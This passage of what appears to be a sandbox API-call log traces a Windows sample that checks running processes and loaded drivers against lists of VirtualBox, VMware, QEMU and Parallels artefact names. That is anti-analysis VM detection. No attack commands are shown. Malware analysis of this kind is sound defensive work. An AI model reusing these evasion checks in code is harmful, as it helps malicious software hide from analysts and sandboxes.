(_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0060.822] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.822] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.822] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.822] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.822] wcsstr (_Str="officeclicktorun.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.822] wcsstr (_Str="officeclicktorun.exe", _SubStr="qga.exe") returned 0x0 [0060.822] wcsstr (_Str="officeclicktorun.exe", _SubStr="windanr.exe") returned 0x0 [0060.822] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.822] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.822] wcsstr (_Str="officeclicktorun.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.822] wcsstr (_Str="officeclicktorun.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.822] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.822] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0060.822] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0060.823] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.823] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.823] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.823] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiadap.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiadap.exe", _SubStr="qga.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiadap.exe", _SubStr="windanr.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiadap.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiadap.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiadap.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiadap.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiprvse.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiprvse.exe", _SubStr="qga.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiprvse.exe", _SubStr="windanr.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiprvse.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.823] wcsstr (_Str="wmiprvse.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.823] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.823] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0060.823] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0060.823] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.823] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.823] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.824] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.824] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.824] wcsstr (_Str="sppsvc.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.824] wcsstr (_Str="sppsvc.exe", _SubStr="qga.exe") returned 0x0 [0060.824] wcsstr (_Str="sppsvc.exe", _SubStr="windanr.exe") returned 0x0 [0060.824] wcsstr (_Str="sppsvc.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.824] wcsstr (_Str="sppsvc.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.824] wcsstr (_Str="sppsvc.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.824] wcsstr (_Str="sppsvc.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.824] wcsstr (_Str="indeed.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.824] wcsstr (_Str="indeed.exe", _SubStr="qga.exe") returned 0x0 [0060.824] wcsstr (_Str="indeed.exe", _SubStr="windanr.exe") returned 0x0 [0060.825] wcsstr (_Str="indeed.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.825] wcsstr (_Str="indeed.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.825] wcsstr (_Str="indeed.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.825] wcsstr (_Str="indeed.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.825] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.825] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="qga.exe") returned 0x0 [0060.825] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="windanr.exe") returned 0x0 [0060.825] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.825] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.825] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.825] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.825] wcsstr (_Str="whatever.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.825] wcsstr (_Str="whatever.exe", _SubStr="qga.exe") returned 0x0 [0060.825] wcsstr (_Str="whatever.exe", _SubStr="windanr.exe") returned 0x0 [0060.825] wcsstr (_Str="whatever.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.825] wcsstr (_Str="whatever.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.825] wcsstr (_Str="whatever.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.825] wcsstr (_Str="whatever.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.825] wcsstr (_Str="however.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.825] wcsstr (_Str="however.exe", _SubStr="qga.exe") returned 0x0 [0060.825] wcsstr (_Str="however.exe", _SubStr="windanr.exe") returned 0x0 [0060.825] wcsstr (_Str="however.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.825] wcsstr (_Str="however.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.825] wcsstr (_Str="however.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.826] wcsstr (_Str="however.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.826] wcsstr (_Str="attention-capital.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.826] wcsstr (_Str="attention-capital.exe", _SubStr="qga.exe") returned 0x0 [0060.826] wcsstr (_Str="attention-capital.exe", _SubStr="windanr.exe") returned 0x0 [0060.826] wcsstr (_Str="attention-capital.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.826] wcsstr (_Str="attention-capital.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.826] wcsstr (_Str="attention-capital.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.826] wcsstr (_Str="attention-capital.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.826] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.826] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="qga.exe") returned 0x0 [0060.826] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="windanr.exe") returned 0x0 [0060.827] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.827] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.827] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.827] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.827] wcsstr (_Str="so light.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.827] wcsstr (_Str="so light.exe", _SubStr="qga.exe") returned 0x0 [0060.827] wcsstr (_Str="so light.exe", _SubStr="windanr.exe") returned 0x0 [0060.827] wcsstr (_Str="so light.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.828] LocalFree (hMem=0x414948) returned 0x0 [0060.828] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0xbed4) returned 0xc0000004 [0060.829] LocalAlloc (uFlags=0x40, uBytes=0xced4) returned 0x414948 [0060.829] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x414948, Length=0xced4, ResultLength=0x18ff5c | out: SystemInformation=0x414948, ResultLength=0x18ff5c*=0xbed4) returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0060.830] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0060.831] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0060.831] strstr (_Str="kdcom.dll", _SubStr="vmci.s") returned 0x0 [0060.831] strstr (_Str="kdcom.dll", _SubStr="vmusbm") returned 0x0 [0060.831] strstr (_Str="kdcom.dll", _SubStr="vmmous") returned 0x0 [0060.831] strstr (_Str="kdcom.dll", _SubStr="vm3dmp") returned 0x0 [0060.831] strstr (_Str="kdcom.dll", _SubStr="vmrawd") returned 0x0 [0060.831] strstr (_Str="kdcom.dll", _SubStr="vmmemc") returned 0x0 [0060.831] strstr (_Str="kdcom.dll", _SubStr="vboxgu") returned 0x0 [0060.831] strstr (_Str="kdcom.dll", _SubStr="vboxsf") returned 0x0 [0060.832] strstr (_Str="kdcom.dll", _SubStr="vboxmo") returned 0x0 [0060.832] strstr (_Str="kdcom.dll", _SubStr="vboxvi") returned 0x0 [0060.832] strstr (_Str="kdcom.dll", _SubStr="vboxdi") returned 0x0 [0060.832] strstr (_Str="kdcom.dll", _SubStr="vioser") returned 0x0 [0060.832] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0060.832] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0060.832] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0060.832] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0060.832] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0060.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0060.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0060.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0060.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0060.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0060.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0060.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0060.833] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0060.834] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0060.834] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0060.834] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0060.834] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0060.834] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0060.834] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0060.834] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0060.835] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0060.835] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0060.835] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0060.835] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0060.835] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0060.835] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0060.835] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0060.836] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0060.836] strstr (_Str="acpi.sys", _SubStr="vmci.s") returned 0x0 [0060.836] strstr (_Str="acpi.sys", _SubStr="vmusbm") returned 0x0 [0060.837] strstr (_Str="acpi.sys", _SubStr="vmmous") returned 0x0 [0060.837] strstr (_Str="acpi.sys", _SubStr="vm3dmp") returned 0x0 [0060.837] strstr (_Str="acpi.sys", _SubStr="vmrawd") returned 0x0 [0060.837] strstr (_Str="acpi.sys", _SubStr="vmmemc") returned 0x0 [0060.837] strstr (_Str="acpi.sys", _SubStr="vboxgu") returned 0x0 [0060.837] strstr (_Str="acpi.sys", _SubStr="vboxsf") returned 0x0 [0060.837] strstr (_Str="acpi.sys", _SubStr="vboxmo") returned 0x0 [0060.837] strstr (_Str="acpi.sys", _SubStr="vboxvi") returned 0x0 [0060.837] strstr (_Str="acpi.sys", _SubStr="vboxdi") returned 0x0 [0060.837] strstr (_Str="acpi.sys", _SubStr="vioser") returned 0x0 [0060.837] strstr (_Str="wmilib.sys", _SubStr="vmci.s") returned 0x0 [0060.837] strstr (_Str="wmilib.sys", _SubStr="vmusbm") returned 0x0 [0060.837] strstr (_Str="wmilib.sys", _SubStr="vmmous") returned 0x0 [0060.837] strstr (_Str="wmilib.sys", _SubStr="vm3dmp") returned 0x0 [0060.837] strstr (_Str="wmilib.sys", _SubStr="vmrawd") returned 0x0 [0060.837] strstr (_Str="wmilib.sys", _SubStr="vmmemc") returned 0x0 [0060.837] strstr (_Str="wmilib.sys", _SubStr="vboxgu") returned 0x0 [0060.837] strstr (_Str="wmilib.sys", _SubStr="vboxsf") returned 0x0 [0060.837] strstr (_Str="wmilib.sys", _SubStr="vboxmo") returned 0x0 [0060.838] strstr (_Str="wmilib.sys", _SubStr="vboxvi") returned 0x0 [0060.838] strstr (_Str="wmilib.sys", _SubStr="vboxdi") returned 0x0 [0060.838] strstr (_Str="wmilib.sys", _SubStr="vioser") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vmci.s") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vmusbm") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vmmous") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vm3dmp") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vmrawd") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vmmemc") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vboxgu") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vboxsf") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vboxmo") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vboxvi") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vboxdi") returned 0x0 [0060.838] strstr (_Str="msisadrv.sys", _SubStr="vioser") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vmci.s") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vmusbm") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vmmous") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vm3dmp") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vmrawd") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vmmemc") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vboxgu") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vboxsf") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vboxmo") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vboxvi") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vboxdi") returned 0x0 [0060.839] strstr (_Str="pci.sys", _SubStr="vioser") returned 0x0 [0060.839] strstr (_Str="vdrvroot.sys", _SubStr="vmci.s") returned 0x0 [0060.839] strstr (_Str="vdrvroot.sys", _SubStr="vmusbm") returned 0x0 [0060.839] strstr (_Str="vdrvroot.sys", _SubStr="vmmous") returned 0x0 [0060.839] strstr (_Str="vdrvroot.sys", _SubStr="vm3dmp") returned 0x0 [0060.839] strstr (_Str="vdrvroot.sys", _SubStr="vmrawd") returned 0x0 [0060.840] strstr (_Str="vdrvroot.sys", _SubStr="vmmemc") returned 0x0 [0060.840] strstr (_Str="vdrvroot.sys", _SubStr="vboxgu") returned 0x0 [0060.840] strstr (_Str="vdrvroot.sys", _SubStr="vboxsf") returned 0x0 [0060.840] strstr (_Str="vdrvroot.sys", _SubStr="vboxmo") returned 0x0 [0060.840] strstr (_Str="vdrvroot.sys", _SubStr="vboxvi") returned 0x0 [0060.840] strstr (_Str="vdrvroot.sys", _SubStr="vboxdi") returned 0x0 [0060.840] strstr (_Str="vdrvroot.sys", _SubStr="vioser") returned 0x0 [0060.840] strstr (_Str="partmgr.sys", _SubStr="vmci.s") returned 0x0 [0060.840] strstr (_Str="partmgr.sys", _SubStr="vmusbm") returned 0x0 [0060.840] strstr (_Str="partmgr.sys", _SubStr="vmmous") returned 0x0 [0060.840] strstr (_Str="partmgr.sys", _SubStr="vm3dmp") returned 0x0 [0060.840] strstr (_Str="partmgr.sys", _SubStr="vmrawd") returned 0x0 [0060.840] strstr (_Str="partmgr.sys", _SubStr="vmmemc") returned 0x0 [0060.840] strstr (_Str="partmgr.sys", _SubStr="vboxgu") returned 0x0 [0060.840] strstr (_Str="partmgr.sys", _SubStr="vboxsf") returned 0x0 [0060.840] strstr (_Str="partmgr.sys", _SubStr="vboxmo") returned 0x0 [0060.840] strstr (_Str="partmgr.sys", _SubStr="vboxvi") returned 0x0 [0060.840] strstr (_Str="partmgr.sys", _SubStr="vboxdi") returned 0x0 [0060.841] strstr (_Str="partmgr.sys", _SubStr="vioser") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vmci.s") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vmusbm") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vmmous") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vm3dmp") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vmrawd") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vmmemc") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vboxgu") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vboxsf") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vboxmo") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vboxvi") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vboxdi") returned 0x0 [0060.841] strstr (_Str="volmgr.sys", _SubStr="vioser") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vmci.s") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vmusbm") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vmmous") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vm3dmp") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vmrawd") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vmmemc") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vboxgu") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vboxsf") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vboxmo") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vboxvi") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vboxdi") returned 0x0 [0060.842] strstr (_Str="volmgrx.sys", _SubStr="vioser") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vmci.s") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vmusbm") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vmmous") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vm3dmp") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vmrawd") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vmmemc") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vboxgu") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vboxsf") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vboxmo") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vboxvi") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vboxdi") returned 0x0 [0060.843] strstr (_Str="mountmgr.sys", _SubStr="vioser") returned 0x0 [0060.843] strstr (_Str="atapi.sys", _SubStr="vmci.s") returned 0x0 [0060.843] strstr (_Str="atapi.sys", _SubStr="vmusbm") returned 0x0 [0060.844] strstr (_Str="atapi.sys", _SubStr="vmmous") returned 0x0 [0060.844] strstr (_Str="atapi.sys", _SubStr="vm3dmp") returned 0x0 [0060.844] strstr (_Str="atapi.sys", _SubStr="vmrawd") returned 0x0 [0060.844] strstr (_Str="atapi.sys", _SubStr="vmmemc") returned 0x0 [0060.844] strstr (_Str="atapi.sys", _SubStr="vboxgu") returned 0x0 [0060.844] strstr (_Str="atapi.sys", _SubStr="vboxsf") returned 0x0 [0060.844] strstr (_Str="atapi.sys", _SubStr="vboxmo") returned 0x0 [0060.844] strstr (_Str="atapi.sys", _SubStr="vboxvi") returned 0x0 [0060.844] strstr (_Str="atapi.sys", _SubStr="vboxdi") returned 0x0 [0060.844] strstr (_Str="atapi.sys", _SubStr="vioser") returned 0x0 [0060.844] strstr (_Str="ataport.sys", _SubStr="vmci.s") returned 0x0 [0060.844] strstr (_Str="ataport.sys", _SubStr="vmusbm") returned 0x0 [0060.844] strstr (_Str="ataport.sys", _SubStr="vmmous") returned 0x0 [0060.844] strstr (_Str="ataport.sys", _SubStr="vm3dmp") returned 0x0 [0060.844] strstr (_Str="ataport.sys", _SubStr="vmrawd") returned 0x0 [0060.844] strstr (_Str="ataport.sys", _SubStr="vmmemc") returned 0x0 [0060.844] strstr (_Str="ataport.sys", _SubStr="vboxgu") returned 0x0 [0060.844] strstr (_Str="ataport.sys", _SubStr="vboxsf") returned 0x0 [0060.844] strstr (_Str="ataport.sys", _SubStr="vboxmo") 